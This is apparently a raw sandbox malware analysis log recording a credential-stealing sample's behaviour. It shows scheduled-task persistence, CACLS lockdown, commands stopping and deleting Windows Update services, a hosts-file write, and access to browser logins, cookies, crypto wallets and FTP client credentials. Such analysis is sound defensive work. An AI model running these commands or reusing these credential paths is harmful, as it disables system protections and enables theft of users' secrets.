Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /F
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe "C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe"
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Users\user\1000018002\avicapn32.exe "C:\Users\user\1000018002\avicapn32.exe"
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\1000019012\syncfiles.dll, rundll
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe "C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe"
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc stop dosvc
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\1000018002\avicapn32.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\1000018002\avicapn32.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\1000019012\syncfiles.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\1000019012\syncfiles.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Roaming\1000021000\umciavi32.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe Queries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0019~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Code function: 0_2_61EAF850 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_61EAF850

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe File written: C:\Windows\System32\drivers\etc\hosts
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Yara match File source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000031.00000002.656321722.000000000F230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.546951720.000000000F0D2000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR
Source: Yara match File source: 4.2.61312899942613011832.exe.1150000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.gntuud.exe.3d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000019.00000002.762181339.00000000003D1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.327105294.0000000001151000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 27.0.avicapn32.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 27.2.avicapn32.exe.bc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001B.00000002.821990980.0000000000E00000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000000.407007293.0000000000E00000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: avicapn32.exe PID: 1112, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\1000018002\avicapn32.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\avicapn32[1].exe, type: DROPPED
Source: Yara match File source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2820, type: MEMORYSTR
Source: Yara match File source: 0.2.DQxttu2Qrr.exe.1090000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DQxttu2Qrr.exe PID: 2508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\???t
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???t
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\???t
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\???t
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\???t
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: Yara match File source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000031.00000002.656321722.000000000F230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.546951720.000000000F0D2000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298618389.000000000079A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000031.00000002.656321722.000000000F230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.546951720.000000000F0D2000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR
Source: Yara match File source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2820, type: MEMORYSTR
Source: Yara match File source: 0.2.DQxttu2Qrr.exe.1090000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DQxttu2Qrr.exe PID: 2508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: umciavi64.exe PID: 68, type: MEMORYSTR
